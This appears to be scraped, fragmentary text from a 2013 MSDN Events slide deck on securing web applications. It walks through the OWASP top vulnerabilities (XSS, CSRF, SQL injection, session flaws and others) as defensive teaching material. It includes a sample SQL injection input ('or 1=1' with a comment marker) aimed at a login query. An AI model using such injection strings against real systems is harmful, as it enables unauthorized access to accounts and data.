Securing Web Applications


3 Νοε 2013 (πριν από 4 χρόνια και 8 μήνες)

186 εμφανίσεις

It’s always better live.

MSDN Events

Securing Web Applications

Part 1 of 2

Understanding Threats and Attacks

Challenges When Implementing

Attacker needs to understand only one
security issue

Defender needs to secure all entry points

Attacker has unlimited time

Defender works with time and cost constraints

Attackers vs. Defenders

Developers and management think that
security does not add any business value

Addressing security issues just before a
product is released is very expensive

Security As an


Secure systems are more difficult to use

Complex and strong passwords are difficult to

Users prefer simple passwords

Security vs. Usability


A Closer look at Top Web Vulnerabilities:

Cross Site Scripting

Injection Flaws

Malicious File Execution

Insecure Direct Object Reference

Cross Site Request Forgery (CSRF)

Information Leakage and Improper Error Handling

Broken Authentication and Session Management

Insecure Cryptography

Insecure Communications

Failure to Restrict URL Access

Open Web Application Security Project (OWASP)

Cross Site Scripting (XSS)

What is Cross Site Scripting

Exploit applications that echo raw, unfiltered
input to Web pages

Malicious code is echoed back into the HTML

Find a <form> field or query string parameter
whose value is echoed to the Web page and
put in malicious script and get a user to
navigate to the page

Allows attackers to execute scripts

Can hijack user sessions

Deface web sites or insert hostile content

Conduct Phishing attacks

Take over the user’s browsers

Cross Site Scripting (XSS)

Three known types of cross site scripting



DOM Injection

Cross Site Scripting (XSS)


A page will reflect user supplied data directly
back to the user

Occurs when a site does not filter content
before displaying it

Allows for hidden site details such as session
or authentication structure to be captured and
potentially utilized

Cross Site Scripting (XSS)

Stored / Sticky XSS

Stores hostile / non
approved data in a file or
a database

Sometimes assumed that stored data is
inherently safe

Internal attacks often exploit this assumption

Dangerous to Systems such as:

Content Management Systems

Blogs or forums

Sites that allow users to see input by other

Cross Site Scripting (XSS)

DOM based attacks

JavaScript code is manipulated

Attacks can be a blend of various attacks

Generally carried out using JavaScript

Allows hackers to manipulate the rendered

Manipulating the DOM tree

Can allow Form Data Hijacking

Can occur without user interaction in
complete transparency

Can utilize the XmlHttpRequest Object

Can compromise checkout information

Cross Site Scripting (XSS)

Cross Site Scripting Demo

Discovery using Reflected Method

Using Stored or Sticky Method

Persistent Attack via Email

Cross Site Request Forgery

Simple and Potentially Devastating

Forces a logged
on victim’s browser to send
a request to a vulnerable web application

Then performs an action on behalf of the

Occurs when authorization is performed
solely on automatically submitted credentials
such as:

Session cookies

Basic authorization credentials

Source IP Addresses

SSL Certificates

Windows domain credentials

Cross Site Request Forgery

Cross Site Request Forgery

Cross Site Request Forgery Demo

Injection Flaws

SQL Injection flaws are common

Occurs when external input is used in
database commands

The supplied data changes the command being

Can allow attackers to create, read, update or
delete data.

Can potentially compromise an entire

Injection Flaws

Example exploit:


FROM Users

WHERE User = ‘User’ AND Password = ‘Password’

The query relies on user submitted
information to perform the query

Malicious code can be submitted such as

Where input could be ‘or 1 = 1

‘ closes preceding string in SQL statement

or 1=1 matches every record in the table


comments out the remainder of the SQL statement

Injection Flaws

SQL Injection Flaw Demos

Adding an Admin Account

Compromising Database Table
Structure and Data

Defacing a Website

Injection Flaws

Not limited to SQL Injection only


HTML Injection (XSS)

HTTP Injection (HTTP Response Splitting)

Malicious File Execution

Occurs when the application is tricked into
executing commands or creating files on
the server

System allows potentially hostile input to be
utilized with file or stream functions such as
URLS or file system references

Can lead to arbitrary remote and hostile
content being included or invoked by server

Allows for remote code execution

Remote root installations or system compromises

Insecure Direct Object Reference

Occurs when an internal implementation
object is exposed such as a:



Database Record or Key


Form Parameter

These can be manipulated if no access
control check is in place

Insecure Direct Object Reference

Applications expose internal objects to

Parameter Tampering allow references
to be changed

Can violate the intended but unenforced
access control policy

Any exposed application construct could be

Code can be attacked when user input is
determining location of Object

Using input parameters such as:


can allow an attacker to traverse the file system

Insecure Direct Object Reference

Insecure Direct Object Reference

Accessing Source Code

Accessing Sensitive Information

Information Leakage and Improper Error

Applications can unintentionally leak
information about their configuration or
internal workings

They can leak state information

Improper error handling exposes internal
workings and implementation details

Stack traces

Failed SQL statements

Other debugging information

This Information can help a hacker
successfully exploit other vulnerabilities

This is an extremely common error and can occur if

file is not properly configured

Information Leakage and Improper Error

Information Leakage and

Improper Error Handling DEMO

Too Much Info on Login Attempts

Too Much Error Information

Broken Authentication and Session

Improper authentication and session

Use of pseudo random session values

Failing to protect credentials and session
tokens after login

Can lead to hijacking of user or admin

Undermine authorization and accountability

Can cause privacy violations

Broken Authentication and Session

Generally ancillary functions cause
problems such as:


Password Management


Remember me

Secret question

Account update

Broken Authentication and Session

Broken Authentication and

Session Management Demo

Displaying Others Profile

Insecure Cryptographic Storage

Correct use of data encryption tools is key
to protection

Flaws can lead to disclosure of sensitive
data and compliance violations

Some of the most common flaws include:

Not encrypting sensitive data

Insecure use of strong algorithms

Usage of weak / homegrown algorithms
A.K.A. “

Hard coding keys or not protecting them

Insecure Communications

Unencrypted traffic can be sniffed

Can access conversation

Potentially expose sensitive information or

Could risk exposing authentication or
session token

Traffic sniffers can access credentials or
sensitive information

Varies by network

Not using SSL for each authenticated request

Failure to Restrict URL Access

Generally URL protection is based on

Pages can still be accessed if not
secured properly

Security by obscurity is not sufficient

Hidden URLS that are only available to certain
users can be stumbled upon or discovered

Client side privilege authentication

Failure to Restrict URL Access

Failure to Restrict URL Access

Security by Obscurity